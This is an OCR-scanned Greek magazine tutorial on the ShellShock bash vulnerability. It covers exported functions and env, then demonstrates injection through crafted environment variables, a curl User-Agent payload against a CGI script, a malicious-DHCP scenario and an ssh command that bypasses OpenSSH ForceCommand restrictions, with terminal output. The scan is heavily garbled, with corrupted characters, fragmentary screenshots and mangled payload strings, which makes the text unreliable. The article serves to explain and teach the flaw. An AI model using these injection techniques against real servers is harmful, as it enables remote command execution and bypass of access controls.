ντος εἰναι λογικὀς, αφού το κἆθε εἶδος ἐχει SIGMOPETIKN αποστολἠ. Παρ' όλα αυτά, 
εἶναι EUKOAO να σκεφτούμε περιπτώσεις που θα µας ενδιέφερε η μεταβίβαση µιας 
"απλής" μεταβλητής στο περιβάλλον εκτέλεσης του BASH. Με αυτὀν τον τρόπο, οι 
μεταβλητὲἐς που δημιουργούνται ano κἀποιο σκριπτάκι θα μπορούσαν να µεταφερ- 
θούν στο περιβάλλον εκτέλεσης του BASH κι ano εκεἰ να κληροδοτηθούν στο πε- 
ριβάλλον µιας νέας διεργασίας. Με àiya λόγια, η μεταβίβαση μεταβλητών στο nepi- 
βάλλον εκτέλεσης θα μπορούσε να λειτουργήσει σαν µια απλἠ και γρήγορη λύση για 
να την επικοινωνία μεταξύ διεργασιών’. E, λοιπὸν, αυτὴ η μεταβίβαση εἶναι εφικτή 
και πραγματοποιείται πανεύκολα µε τη βοήθεια της εντολἠς export. Αρκεί να EKTEAE- 
σουµε τη συγκεκριμένη εντολἠ και να δώσουμε σαν µοναδικἠ παράμετρο το ὀνομα 
µιας μεταβλητής. AUTO όμως ενδέχεται να το γνωρίζατε Non. Κάτι που ενδέχεται να 
µη γνωρίζατε, εἶναι ὁτι µε τη βοήθεια της export μπορούμε να τοποθετήσουµε στο 
περιβάλλον ακόµα κι ολόκληρες συναρτήσεις. Πα την τοποθέτηση µιας συνάρτησης 
στο περιβάλλον χρησιμοποιούμε την εντολἠ export µε την παράμετρο -f (ano το 
function) και στη συνέχεια δίνουμε TO ὀνομα της συνάρτησης. 


pvarécrunchbang:~$ 


pvarécrunchbang:~$ 


jpvar€crunchbang:~$ 


hello world! 
pvar@crunchbang:~$ 


Με τη βοήθεια της εντολἠς export και της παραμέτρου -f, μπορούμε να µετα- 
τρέψουμε µια απλή συνάρτηση σε "συνάρτηση περιβάλλοντος". Έτσι, οι νέες 
διεργασίες του BASH που κληρονομούν το περιβάλλον, θα κληρονομούν και 
τον ορισμό της συνάρτησης. 


pvar€crunchbang:~$ 
/home/pvar <— 
pvar@crunchbang:~$ 


pvar@crunchbang:~$]}env HOME='/home/pvar/tmp' bash -c ‘echo $HOME' 
/home/pvar/tmp ee 
|pvar@crunchbang:~$ 


pvar@crunchbang:~$ 
/home/pvar <—— 
pvar@crunchbang:~$ 


Με τη βοήθεια του env μπορούμε va εκτελούμε ἆλλα προγράµµατα, τα οποία θα κλη- 
ρονομούν τροποποιημένες εκδοχές των μεταβλητών περιβάλλοντος. Όπως βλέπετε, η 
επέμβαση στην τιµή της μεταβλητής HOME µε τη βοήθεια του env ισχύει μόνο για τη νέα 
διεργασία του BASH. Με ἄλλα λόγια, οι επεμβάσεις του env εἶναι προσωρινές! 


4. Αναφερόµαστε στο λεγόμενο Inter-Process Communication ἡ απλά IPC. 
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μα pyar@crunchbang: ~ =. 5% 
pvar@crunchbang:~$ 


pvarécrunchbang:~$|my func(){ echo "function output..."; } 


pvar@crunchbang:~$ 

pvar€crunchbang: ~$ [export -f my func ] 

pvarécrunchbang .-- 

pvar@crunchbang:~$]env | 

ORBIT ' SOCKETDIR=/ tmp/orbit-pvar 

SSH AGENT | PID=3103 

SHELL=/bin/bash 

|TERM=xterm 

‘XDG | SESSION _COOKIE=12e5946a9e4744654d925c17518bd3£3-1414054411.12256-1 
WINDOWID=27262980 

GNOME KEYRING CONTROL=/home/pvar/.cache/keyring-tS7hcb 
USER=pvar 


HOME=/home/pvar 

LOGNAME=pvar 

DBUS_ SESSION BUS ADDRESS=unix:abstract=/tmp/dbus-5D3iSFLtzo, guid=93d6f 
6eec5448c20b_ 


DISPLAY=:0.0 
XAUTHORITY=/home/pvar/.Xauthority 
\COLORTERM=gnome-terminal 

my func=() { echo -e "function output..." 


a ernea: ᾱ-φ 


Με το env μπορούμε να βλέπουμε ὀλες τις μεταβλητές περιβάλλοντος και την τιµή της καθεμί- 
ας. Ενδιαφέρον παρουσιάζει ο τρόπος µε τον οποίο αποθηκεύονται οι συναρτήσεις. Όπως BAE- 
NETE, ο KWOIKAG τους αποθηκεύεται μαζί µε Eva ζευγάρι παρενθέσεων, µέσα σε μία ομώνυμη 
μεταβλητή. Το γεγονός αυτό καθιστἀ εὐκολη την εξαπάτηση Tou BASH. 


Εξετάζοντας τη χρησιμότητα και το χειρισμό του περιβάλλοντος θα ἦταν παράλειψη 
να µην αναφερθούμε και στο πρὀγραμμα env. Το ὀνομά του προκύπτει and τη λέξη 
environment και πρὀκειται για Eva εργαλείο µε δύο λειτουργίες: Την εμφάνιση των 
μεταβλητών που ἐχουν αποθηκευτεἰ στο περιβάλλον και την προσωρινἠ επἐµβαση 
στα δεδομένα του περιβάλλοντος, µε στὀχο την EKTEAEON µιας διεργασίας σε τροπο- 
ποιημένο περιβάλλον. Νομίζουμε OT! η πρώτη λειτουργία εἶναι αρκετά απλἠ και δεν 
χρειάζεται εξηγἠσεις. Αν εκτελἐσουµε το env χωρίς παραμέτρους θα τυπώσει OAEG 
τις μεταβλητές περιβάλλοντος και τις αντίστοιχες τιμές. H χρησιμότητα της δεύτε- 
ρης λειτουργίας θα φανεἰ ευκολότερα δίνοντας Eva παράδειγµα: Ας υποθέσουμε ὁτι 
θέλουμε να τρἐξουµε ἑνα πρὀγραμμα, το οποίο συνηθίζει να δημιουργεἰ προσωρινά 
αρχεία μέσα στον προσωπικὀ µας κατάλογο (home directory). Ας υποθέσουμε επἰσης 
ότι αυτἠ η συμπεριφορά μὰς ενοχλεί ιδιαίτερα (εἶναι μεγάλη τσαπατσουλιάἀ, πὠς va 
το κάνουμε!) αλλά το πρόγραµµα δεν παρέχει κάποια σχετικἠ ρύθμιση. O ευκολότε- 
ρος τρόπος για να εξασφαλἰσουμµε ὅτι το home directory δεν θα γεμίζει µε προσωρινά 
αρχεία, εἶναι va εξαπατήσουμετο εν λόγω πρὀγραμμα και να TO κάνουμε να πιστέψε 
ότι ο προσωπικὀς µας κατάλογος εἶναι κάποιος ἄλλος. Κάτι τέτοιο µπορεί να γίνει 
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πανεύκολα, τροποποιώντας τη HETABANTN περιβάλλοντος ΗΟΜΕ. Ὅμως, η επἐµβαση 
σ' αυτή τη μεταβλητή µπορεἰ να προκαλέσει προβλήματα σε ἄλλα προγράμματα. Τι 
μπορούμε να κάνουμε γι’ αυτό, λοιπὸν; Μα, φυσικἁ, να επιστρατεύσουµε το env και 
να εκτελἐσουµε το τσαπατσούλικο πρὀγραμμα σε Eva τροποποιημένο περιβάλλον, 
στο οποίο η μεταβλητή HOME θα ἐχει διαφορετικἠ τιµή: 


$env HOME='/home/pvar/tmp/' little_messy_program 


Με αυτόν τον τρόπο, η τροποποἱηση στη µεταβλητή ΗΟΜΕ δεν θα εφαρμοστεί στο 
περιβάλλον εκτέλεσης του BASH και δεν θα κληροδοτηθεἰ σε κανένα ἄλλο πρὀγραμ- 
μα. 


pvar@crunchbang:~$ 


pvar€crunchbang:~$]my var='() { echo "is this a function?"; }' 


pvaré@crunchbang:~$ 
pvar€crunchbang:~$ 
pvar€crunchbang:~$ 


pvar@crunchbang: ~$ 


is this a function 


pvar@crunchbang:~$ ee 


pvar€crunchbang:~$ 


Ε = = — ee — — = ——___— — --------- 


Ορίστε και οι αποδείξεις του Ιισχυρισμού µας. H νέα διεργασία του BASH εκτελεί τη... 
μεταβλητὴἡ µας, σαν µια κανονική συνάρτηση. AUTO συμβαίνει επειδἠ η τιµή της µετα- 
βλητής εἶναι κατάλληλα κατασκευασμένη, ώστε το BASH να μπερδεύεται και να νομίζει 
ότι διαβάζει τον ορισμὀ µιας συνάρτησης. 


Κρυμμένες αδυναμἰες 


Πιστεύουμε OT! ὁσα ἐχουμε πει μέχρι στιγμής ἦταν απλά και κατανοητά, αν ὀχι και 
γνωστά. Όπως και να 'χει, ciTe τα ακούσατε για πρώτη φόρα εἶτε τα γνωρἰζατε ἠδη, 
εἶναι πολύ πιθανό να αναρωτιέἑστε για ποιο λὀγο καταπιαστἠκαµε μ' αυτά τα θέματα. 
E, λοιπὀν, η αδυναμία που ονομάστηκε ShellShock σχετἰζεται µε τον τρόπο αποθἠ- 
κευσης των συναρτήσεων στο περιβάλλον, καθώς και µε TO συνολικότερο χειρισμὀ 
των αποθηκευμένων συναρτήσεων. Στη συνέχεια θα εξετάσουμε αυτὲς τις δύο aðu- 
ναμίες ano κοντὰ. 


Όπως αναφέραμε dn, όταν εκτελούμε το πρὀγραµµα env χωρίς kapia παράμετρο, 
εμφανίζει ὀλες τις μεταβλητὲς περιβάλλοντος. Ας κάνουμε va μικρὀ πεἰραμα. Ξεκι- 
νάμε δημιουργώντας µια απλἠ συνάρτηση: 


$ my_func() { echo 'this is a function’; } 


Στη συνέχεια μεταφέρουμε τη συγκεκριμένη συνάρτηση στο περιβάλλον, χρησιμο- 
ποιώντας την εντολἠ export: 
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$ export -f my_func 


Topa εκτελούμε το πρὀγραμμα env, για να δούµε τα δεδοµένα που ἐχουν αποθηκευ- 
Tei στο περιβάλλον. Ανάμεσα στις διάφορες μεταβλητὲς περιβάλλοντος θα συναντή- 
OOUHE και την ακόλουθη: 


my_func=() { echo ‘this is a function'; } 


Μα, τι γίνεται εδώ; H συνάρτηση που µεταφέραμε στο περιβάλλον ¿xei αποθηκευτεἰ 
σαν µια μεταβλητή. Μόνο που η φαινομενικὴ της τιµή ξεκινά µε Eva ζεύγος napev- 
θέσεων, συνεχίζει µε ἑνα KEVO χαρακτήρα και ολοκληρώνεται µε τον κὠδικα της 
συνάρτησης. Αναρωτιέστε τι συμπεραίνουμε απ' αυτό; Πα την αποθήκευση των ou- 
ναρτήσεων δεν επιστρατεύεται κανενὸς εἶδους μαρκάρισμα και Kapia κωδικοποίηση. 
Τίποτα δεν ξεκαθαρίζει το αν πρὀκειται για µια απλἠ μεταβλητἠ ἡ για µια συνάρτηση. 
Νομίζετε ὁτι υπερβάλλουμε; Ας κάνουμε μία δοκιµή για να τσεκάρουµε την εικασἰα 
μας. Ας ορίσουµε την ακόλουθη μεταβλητή: 


$ my_var='() { echo "is this a function?"; }' 


Ας τη μεταφέρουμε τώρα στο περιβάλλον µε τη βοήθεια της export: 
$ export my_var 


Σημειώστε ὁτι δεν χρησιμοποιήσαμε την παράμετρο -ἴ, που δηλώνει ὁτι µεταφέρου- 
µε στο περιβάλλον µια συνάρτηση. Χρησιμοποιήσαμε την εντολἠ export χωρίς καμία 
ειδικἠ παράμετρο, ὁπως θα κάναμε µε οποιαδήποτε "φυσιολογικἠ" μεταβλητή. E, 
λοιπὸν, αν μετὰ απὀ τα παραπάνω βήματα ξεκινήσουμε µια ved διεργασία του BASH 
και μέσα σε αυτήν προσπαθήσουμε να εκτελέσουµε τη συνάρτηση my_var, θα EKTE- 


not pvar@crunchbang;: ~ -0x 
jpvar@crunchbang:~$ 

jpvar€crunchbang:~$ -------.--α; 
pvar@crunchbang:~$ 

pvar@crunchbang:~$ 

pvar@crunchbang:~$ 

pvar@crunchbang:~$ 

\gotcha! 

print this line and exit 

pvar@crunchbang:~$ 


Όταν To BASH συναντά Tov ορισμὀ µιας συνάρτησης στο περιβάλλον, κἀνει κάτι 
εντελώς απρόσμενο κι ἄκρως επικίνδυνο: Αφού διαβάσει τον κώδικα της συνάρτησης, 
Ἐεκτελεί, οτιδήποτε βρίσκεται αµέσως µετά! Στην εικόνα βλέπουμε ὁτι η νέα διεργασία 
του BASH εκτέλεσε τον ύπουλα εμφυτευμένο κώδικα πριν εκτελέσει AUTÓ που εἶχαμε 
ζητήσει, δηλαδή κατά την επεξεργασία του περιβάλλοντος. 
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λεστεἰ Kavovika! Το γεγονὸς ότι πρὀκειται για µια μεταβλητὴ δεν παἰζει κανένα ρὀλο. 
H τιμή της ἐχει τέτοια µορφή, που To BASH νομίζει ότι πρὀκειται για συνάρτηση. Ev 
ολίγοις, μόλις ξεγελάσαμε το BASH και μάλιστα µε ἑναν τόσο χοντροκομμένο τρὀ- 
πο που δεν θα το περίμενε κανείς. Δεν ξέρουμε αν µπορείτε να φανταστείτε πὀσο 
επικἰνδυνη εἶναι αυτή η απάτη, αλλά θα το διαπιστώσετε σύντομα. Πα την wpa θα 
εξετάσουμε την ἄλλη αδυναμία. 


Ὅταν EKTEAOUHE éva VEO στιγμιότυπο του BASH, στη φάση που συγκροτείται το νέο 
περιβάλλον συμβαίνουν σημεία και τἐρατα. Αν ο parser του BASH συναντήσει εντὸς 
του περιβάλλοντος µια συνάρτηση, θα τη δημιουργήσει κανονικά και στη συνέχεια 
θα «εκτελέσεικ οτιδήποτε ακολουθεἰ τον ορισμό της συνάρτησης. Προσέξτε τι yi- 
νεται εδώ: To BASH δεν θα εκτελέσει αυτόματα τη συνάρτηση -κάτι που θα ἦταν 
οὑτως ἡ ἄλλως απαράδεκτο-, αλλά θα εκτελέσει οτιδήποτε ἐπεται του ορισμού της 
συνάρτησης. AUTO EKTOG ano επικἰνδυνο εἶναι κι εντελὠς απρὀσμενο! Ας κάνουμε 
πάλι ἑνα μικρὸ πεἰραμα, για να διαπιστώσετε πόσο αλλόκοτη εἶναι η συμπεριφορά 
του BASH. Ξεκινάμε δημιουργώντας και NGAI µια μεταβλητή: 


$ my_var='() { echo "test"; }; echo "Gotcha!"' 


Όπως βλέπετε, η τιµή της µεταβλητἠς εἶναι κατάλληλα κατασκευασμένη WOTE όταν 
μεταφερθεί στο περιβάλλον να αντιµετωπιστεἰ σαν συνάρτηση. Μόνο που μετὰ το 
δεξιό GYKIOTPO (εκεἰ ὁπου ολοκληρώνεται ο ορισμός της συνάρτησης) ἐχουμε Tono- 
θετήσει ἑνα ελληνικὀ ερωτηματικὀ και αµέσως μετὰ εκτελούμε το πρὀγραμμα echo, 
για την εμφάνιση του μηνύματος "Gotcha!". Ας μεταφέρουμε αυτή την παράξενη 
μεταβλητή στο περιβάλλον: 


$ export my_var 


pvar@crunchbang:~$ 
pvar@€crunchbang:~$ 


Gotcha! 


jpvar@crunchbang:~$ 


Παράδειγμα εκμετάλλευσης των αδυναμιών του BASH, σε μία μόνο γραµµή! Με τη βοήθεια του 
env δημιουργήσαμε µια νέα μεταβλητή περιβάλλοντος και ξεκινήσαμε µια διεργασία του BASH. H 
μεταβλητή µας ἐχει κατάλληλα σχηματισμένη τιμή, ώστε να αντιμετωπιστεί aNd το κέλυφος σαν 
συνάρτηση. Ωστόσο, µετά τον ορισμό της υποτιθέµενης συνάρτησης τοποθετήσαµε και πρὀσθετο 
κώδικα. Όπως βλέπετε, αυτός ο κώδικας εκτελέστηκε άµεσα ano τη νέα διεργασία του BASH! 
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ETOINGOTEITE τώρα για µια μικρἠ αποκάλυψη! Αν δοκιµάσουμµε να εκτελἐσουµε Eva 
νέο στιγμιότυπο του BASH κι ανεξάρτητα ano το τι θα του ζητήσουμε να κάνει, το 
πρώτο πράγμα που θα συμβεί εἶναι η εμφάνιση του μηνύματος "Gotcha!". Ακόμα κι 
αν δώσουμε κάτι τέτοιο... 


$ bash -ς : 


που σημαίνει την EKTEAEON ενὀς null statement (δηλαδή του τίποτα), ο parser του 
BASH θα διαβάσει τη μεταβλητή my_var, θα την αντιμετωπίσει ως συνάρτηση, θα 
τη δημιουργήσει και ακολούθως θα εκτελέσει οτιδήποτε βρίσκεται μετὰ τον ορισμὀ 
της συνάρτησης! 


Πιστεύουμε ὁτι αντιλαμβάνεστε την κρισιµότητα αυτών των αδυναμιών. Μπορείτε 
όμως να Φανταστείτε NWS και γιατὶ θέτουν σε κίνδυνο την ασφάλεια ενὸς server; 
Μιλάμε ακόμα και για Servers ὁπου οι χρήστες τους δεν xouv καμία επαφἠ µε το 
κέλυφος... 


Απὀ τον ἐξω κόσμο, στο μέσα κόσμο ;) 


Λίγο πριν αναφερθούμε για πρὠτη φορά στην EvTOAN export, περιγράψαμε µια πιθα- 
vn χρήση των μεταβλητών περιβάλλοντος. Συγκεκριµένα, αναφέραμε ὁτι μπορούν 
να λειτουργήσουν σαν Eva μέσο για τη µεταφορά δεδομένων and μία διεργασία 
προς μία ἄλλη. Μπορεί auto το σενάριο να σας φάνηκε εξεζητημένο και να µην του 
δώσατε προσοχή, αλλά πρέπει να ἐχετε υπόψη σας ὁτι αυτή η μέθοδος επικοινωνἰ- 
ας χρησιμοποιείται αρκετά συχνὰ. Δυο συνηθισμένες περιπτώσεις -Nou σχετίζονται 
ἄμεσα και µε το θέµα pag- εἶναι στους web servers που εκτελούν CGI scripts και σε 
ορισμένους DHCP clients. Ας δούµε ποιο πρὀβλημα προκύπτει σε κάθε περἰπτωση... 


Φανταστείτε µια ιστοσελίδα της οποίας το περιεχόµενο παράγεται ano κἀποιο CGI 
script. To script εκτελείται ano τον web server (n.x., τον Apache, µε τη βοήθεια Tou 
mod_cgi ἡ του mod_python), ο οποίος φροντίζει va το τροφοδοτήσει µε όλα τα απα- 
paitnta δεδομένα. Όπως εἰπαμε Non, η μεταφορά των δεδοµένων πραγματοποιείται 
µε τη χρήση των κατάλληλων μεταβλητών περιβάλλοντος, που δημιουργεί ο web 
server λἰγο πριν την εκτέλεση του script. Όμως, τι εἶδους δεδοµένα μεταφέρονται 
προς To script; Ακόμα κι όταν πρὀκειται για µία ιστοσελἰδα που δεν δέχεται παραμὲ- 
τρους POST ἡ GET, οι web servers εἶθισται να στέλνουν προς τα CGI scripts μερικὰ 
ano τα δεδοµένα που κατοικούν στα headers των HTTP requests (π.χ., το referrer 
και To User-Agent). Τελικά, τα δεδομένα που καταλήγουν να τοποθετηθούν σε kå- 
ποια μεταβλητή περιβάλλοντος προέρχονται ano το χρήστη”. Ας δούμε τώρα πώς 
θα μπορούσε να εκμεταλλευτεὶ κανεὶς τις αδυναμἰες που περιγράψαμε νωρίτερα. Το 
μόνο NOU ἐχει να κάνει εἶναι να τροποποιήσει την τιμὴ του User-Agent, που στέλνει ο 
browser προς Tov server. Πα παράδειγµα, αρκεἰ να του δώσει την ακόλουθη µορφή: 


() { :3 }3 echo 'Gotcha!' 


Ὅταν το συγκεκριµένο string τοποθετηθεί σε µια μεταβλητἠ περιβάλλοντος, το 
BASH θα την ερμηνεύσει ως µια µικροσκοπικἡ συνάρτηση (η οποία περιλαμβάνει 
μόνο éva null statement) και στη συνέχεια θα εκτελέσει τις εντολὲς που ακολου- 
θούν. Αυτὀ ἦταν ὁλο! Με µια απλἠ κίνηση, ο επισκέπτης της σελἰδας υποχρέωσε τον 
server να εκτελέσει κώδικα. Από τη στιγμὴ που ο web server εκτελεἰ CGI scripts και 
το σύστημα χρησιμοποιεί το κέλυφος BASH, η επίθεση που παρουσιάσαµε θα λει- 


5. Ὑπάρχουν plugins για όλους του δημοφιλείς browsers, που επιτρέπουν την αλλοίωση των header των HTTP requests και ειδικἀ τον ορισμό 
µιας αυθαίρετης τιμής για To User-Agent. 
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τουργἠσει. Δεν χρειάζονται εκατοντάδες προσπάθειες, οὐτε τύχη, οὐτε προσευχές. 
Πα τους φανατικούς της γραμμής εντολών, η επίθεση θα μπορούσε να πραγµατο- 
ποιηθεἰ εξίσου άνετα και απὀ την κονσόλα, µε τη βοήθεια του προγράµµατος curl: 


$ curl -Α "() { :3 }; echo ‘Gotcha!'" http://server.com/cgi/script.cgi 


Σε GUTO το σηµείο πρέπει να υπογραμμµίσουµε µια λεπτομέρεια. H εκτἐλεση TOU KW- 
δικα µε TO παραπάνω τἐχνασμα πραγματοποιείται µε τα δικαιώματα του web server, 
αφού αυτός εκτελεἰ TO VEO στιγμιότυπο του BASH. Τι µας διδάσκει αυτὀ; Κάτι που 
γνωρίζουμε Non και δεν πρέπει να ξεχνάμε ποτὲ: Οι υπηρεσίες ενὸς συστήματος 
πρέπει να εκτελούνται πάντα µε τα ελάχιστα δυνατὰ δικαιώματα! 


[pvar@crunchbang:~$ 


pvar@crunchbang:~$}ssh delta@192.168.1.5 


You are only allowed to run ps 


USER PID %$CPU $MEM VSZ RSS TTY STAT START TIME COMMAND 

delta 3046 0.0 0.1 12400 1436 pts/0 Ss+ 00:34 0:00 bash -c echo -e '\nYou are only a 
delta 3047 0.0 0.1 18444 1272 pts/0 R+ 00:34 0:00 \_ /bin/ps uf 

delta 1287 0.0 0.3 22552 3868 ttyl St 00:17 0:00 -bash 


Connection to 192.168.1.5 closed. 
pvar@crunchbang:~$ 
pvar@crunchbang:~$ 
pvar@crunchbang:~$ 


pvar@crunchbang:~$| ssh delta@192.168.1.5 '15 -lh /srv/www/deltahacker.gr/wp-content/' 


You are only allowed to run ps 
USER PID CPU $MEM VSZ RSS TTY STAT START TIME COMMAND 


delta 1287 0.0 0.3 22552 3868 ttyl S+ 00:17 0:00 -bash 
pvaręêcrunchbang:~$ 


O λογαριασμός SSH που διαθέτουμε για το σύστημα στη διεύθυνση 
192.168.1.5 εἰναι "κλειδωμένος”. O διαχειριστής TOU μηχανήματος, 
αξιοποιώντας Tn λειτουργία ForceCommand του OpenSSH server, 
επιτρέπει µόνο την εκτέλεση του προγράµµατος ps. Κάθε απὀπειρα 
σύνδεσης ἐχει ως συνέπεια την εκτέλεση της συγκεκριμένης εντολής 
ΚΙ αµέσως µετά τον αυτόματο τερματισμό της συνεδρίας. 


Κάτι παρόμοιο συμβαίνει και µε ορισμένους DHCP clients, οι οποίοι πραγματοποιούν 
ρυθμίσεις στο σύστημα µε τη βοήθεια των κατάλληλων BASH scripts. Ano τη μία, ο 
DHCP client επικοινωνεί µε τα scripts χρησιμοποιώντας μεταβλητὲς περιβάλλοντος. 
Ano την ἄλλη, τα δεδοµένα που αποστέλλονται στα scripts προέρχονται and Tov 
DHCP server. Επομένως, αν ο DHCP server βρίσκεται υπὸ τον ἐλεγχο ενὸς κακὀ- 
βουλου χρήστη, µπορεἰ να εκπέμψει Eva κατάλληλα διαμορφωμένο string και... VO- 
μίζουμε ὁτι μπορείτε να φανταστείτε τη συνέχεια. Το πρωτόκολλο DHCP προβλέπει 
τη μετάδοση πολλών μεγεθών (ονομάζονται και options), πολλά ano τα οποία δεν 
εἶναι αριθμητικά. fia παράδειγµα, To option µε κωδικό αριθμό 44 εἶναι το ὀνομα του 
NETBIOS server Tou τοπικού δικτύου και πρὀκειται για string. Το ἰδιο ισχύει και πολ- 
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Ad ακόµα options. Φανταστείτε, λοιπὸν, µια επίθεση που πραγματοποιείται ano vav 
κατειλημμένο DHCP server. Αντιλαμβάνεστε πόσο ὑπουλη κι επικίνδυνη εἶναι; O na- 
ράνομος κὠδικας θα εκτελεστεἰ απὀ Eva στιγμιότυπο του BASH, το οποίο πρὀκειται 
να πραγματοποιήσει ρυθμίσεις στο σύστημα. Επομένως, πρὀκειται για µια διεργασία 
που εκτελεἰται µε τα δικαιώµατα του root. 


Ατελείωτοι μπελάδες 


Νομίζουμε ὁτι πλέον ἐχετε αρχίσει να αντιλαμβάνεστε την ἑκταση και την κρισιμὀ- 
τητα των προβλημάτων που δημιούργησε το ShellShock. Παρ' όλα αυτά αξίζει να 
αναφέρουμε μία ακόμα περίπτωση, που δείχνει ὁτι η συγκεκριμένη αδυναμία στο 
κέλυφος BASH μπορεί να επηρεάσει ακόμα και συστήματα που μοιάζουν απὀρθη- 
τα. Σε αντίθεση µε τα προηγούμενα σενάρια auTO που θα δούμε τώρα εἶναι αρκετά 
εξεζητημένο, αλλά πιστεύουμε OTI EXE! μεγάλη διδακτική αξία. Θα μιλήσουμε για 
συστήματα που τρέχουν τον OpenSSH server και κἀνουν χρήση µιας λειτουργίας 
που ονομάζεται ForceCommand. H εν λὀγω λειτουργία χρησιμοποιείται σε ελάχιστες 
περιπτώσεις απὀ τους διαχειριστὲς μικρῶν συστημάτων κι ακόμα πιο σπάνια and 
τους χομπίστες. Τις περισσότερες φορὲς χρησιμοποιείται and administrators μεγὰ- 
λων συστηµάτων και προσφέρει µια πολύτιμη δυνατότητα: Περιορίζει τις ενέργειες 
που µπορεί να εκτελέσει στο σύστημα ἑνας χρήστης κι επιτρέπει μόνο την εκτἐλεση 
µιας συγκεκριμένης εντολἠς. 


Φανταστείτε ἑναν ETAIPIKO Server που διατηρεἰ δεδομένα υψηλἠς αξίας ἡ εξυπηρετεἰ 
πολύ κόσμο και, τέλος πάντων, η οµαλἠ λειτουργία του εἶναι κρίσιμη. Φανταστείτε 
επἰσης ὁτι κἄποιος Manager της εταιρείας αποκτά λογαριασμὸ χρήστη (µε δικαιώμα- 
τα απομακρυσμένων συνδέσεων µέσω SSH), μόνο και μόνο για να τσεκάἀρει τα ap- 
χεία που βρίσκονται σε ἑναν συγκεκριμένο κατάλογο. Όπως καταλαβαίνετε, επειδἠ 
τα στοιχεία σύνδεσης στο λογαριασμὀ θα μπορούσαν να διαρρεύσουν ἡ, ακόμα πιο 
απλά, επειδἠ ο manager ενδέχεται να κάνει λάθη, να κοιτάξει σε καταλόγους που 
δεν πρέπει κ.ο.κ., εἶναι σημαντικὀ να διαθέτει vav αυστηρά περιορισμένο λογαρια- 
OHO. Όχι απλά Evav λογαριασμὀ µε ελάχιστα δικαιώματα, αλλά ἐναν λογαριασμὀ που 
µπορεί να εκτελεἰ μία συγκεκριμένη εντολἠ και μόνο. Πα παράδειγµα: Is -Ih /some/ 
directory/for/managers. E, Aoinov, κάτι τέτοιο μπορεί να γίνει πανεύκολα µε τη Boñ- 
θεια της λειτουργίας ForceCommand. Αν ο διαχειριστἠς Tou server αξιοποιήσει αυτή 
τη δυνατότητα του OpenSSH, κάθε φορά που o manager συνδέεται στο λογαριασμὀ 
του θα εκτελείται αυτόματα η εντολἠἡ Is -Ih /some/directory/for/managers και στη 
συνέχεια το SSH session θα τερματίζεται. Ακόμη κι αν ο manager ζητήσει ano τον 
SSH client τη σύνδεση και την αυτόματη εκτέλεση µιας ἄλλης εντολἠς, ο server θα 
κάνει αυτό που πρέπει και θα αγνοήσει το αἰτημα του manager. Εδὠ όμως υπάρχει 
µια κρίσιμη λεπτομέρεια. Ας υποθέσουμε ὁτι ο Manager ù, τέλος πάντων, αυτὸς που 
χρησιμοποιεί το λογαριασμό του manager®, εκτελεἰ κάτι τέτοιο: 
$ ssh mngr@critical-server.com cat /etc/passwd 

Ὅπως εἶπαμε ἠδη, ο server θα αγνοήσει την EvTOAN που "παρήγγειλε" ο manager και 
θα εκτελέσει μόνο αυτό που ἐχει ορίσει ο administrator. Τι θα γίνει όμως µε το string 
"cat /etc/passwd"; Θα χαθεί για πάντα; Δυστυχώς oxi! O SSH server θα To τοποθε- 
τήσει σε µια μεταβλητή περιβάλλοντος που ονομάζεται SSH_ORIGINAL_COMMAND 


και μετά” θα εκτελέσει την EVTOAN που ἐχει καθορίσει ο administrator. Δηλαδή, 
αφού το συγκεκριμένο string τοποθετηθεἰ σε µια μεταβλητή περιβάλλοντος, θα 


6. ...Κάποιος που ξέρει ano υπολογιστές ;) 
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εκτελεστεἰ ἑνα στιγμιότυπο του BASH. Νομίζουμε ὁτι το πρὀβλημα εἶναι πλέον odo- 
φάνερο: Το ShellShock επιτρέπει σ' Evav επιτήδειο manager να παρακάμψει τους 
περιορισμούς του διαχειριστἠ και να εκτελέσει οποιαδήποτε εντολἠ. Το μόνο που 
ἐχει να κἀνει εἶναι να δώσει κἀτι τέτοιο: 


$ ssh mngr@critical-server.com '() { :; }; echo "ρονπεά by a manager" > ~/yo' 


Και κάπου εδώ, οφεἰλουμε να παραδεχτούμε ὁτι ο Manager nou θα ἐκανε κἀτι τέτοιο 
θα κἑρδιζε τον αιώνιο σεβασμὀ µας - κυρίως για TO χιούμορ του |) 


\pvar@crunchbang:~$ 
pvar@crunchbang:~$ ssh delta@192.168.1.5 
total 4.1M 


drwxr-xr-x www-data www-data 4.0K Aug 6 23:46 backups-a0S9d8F7g6H5j4K312Z1 
(drwxr-xr-x www-data www-data 4.0K Aug 6 23:46 backwpup-logs-a0S9d8F7g6H5j4K31221 
[drwxr-xr-x www-data www-data 4.0K Aug 6 23:46 cache 

|-rw-r--r-- www-data www-data 4.0M Sep 16 23:15 debug.log 

drwxr-xr-x 14 www-data www-data 4.0K Jun 18 10:10 gallery 

-rw-r--r-- www-data www-data 30 Jun 19 2013 index.php 


[drwxr-xr-x 
(drwxr-xr-x 
drwxr-xr-x 
(drwxr-xr-x 
(drwxr-xr-x 
drwxrwxr-x 


www-data www-data 4.0K Aug 6 23:46 languages 
www-data www-data 4.0K Sep 14 12:52 plugins 
www-data www-data 4.0K Jun 19 2013 sedlex 
www-data www-data 4.0K Sep 14 12:53 themes 
www-data www-data 4.0K Sep 14 12:53 upgrade 
www-data www-data 4.0K Jan 1 2014 uploads 
drwxr-xr-x www-data www-data 4.0K Aug 6 23:47 w3tc-config 
drwxr-xr-x www-data www-data 4.0K Jun 19 2013 xscape 
pvar@crunchbang:~$ 


N 
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Το σύστημα στη διεύθυνση 192.168.1.5 χρησιμοποιεί το BASH και δεν εἶναι ενηµε- 
ρωμένο. Με λίγα λὀγια, εἶναι ευάλωτο στις επιθέσεις που αξιοποιούν την αδυναμία 
ShellShock. Έτσι, όπως μπορείτε να διαπιστώσετε, ξεπεράσαµε µε μεγάλη ευκολία 
τους περιορισμούς που εἶχε επιβάλει ο διαχειριστής TOU server. 


Τα πρὠτα μπαλώματα... 


Όπως αντιλαμβάνεστε, οι δικὲς µας δοκιμὲς ἐγιναν σε εικονικἀ μηχανήματα που δεν 
εἰχαν δεχτεἰ τις ενημερώσεις για την αντιμετώπιση Tou ShellShock. Αν έχετε κι εσεὶς 
καμία ξεχασμένη εικονικἠ μηχανή µε Linux (Σ.τ.Ε. Ἡ µπορείτε να φτιάξετε Eva VM µε 
"παλιό" Linux-based guest OS), θα σας προτεἰναμε να αναπαράγετε τις δοκιμές µας 
MOTE να πάρετε µια καλὴ γεύση ano πρῶτο χέρι. Πάντως, ano τα τέλη του Σεπτέμ- 
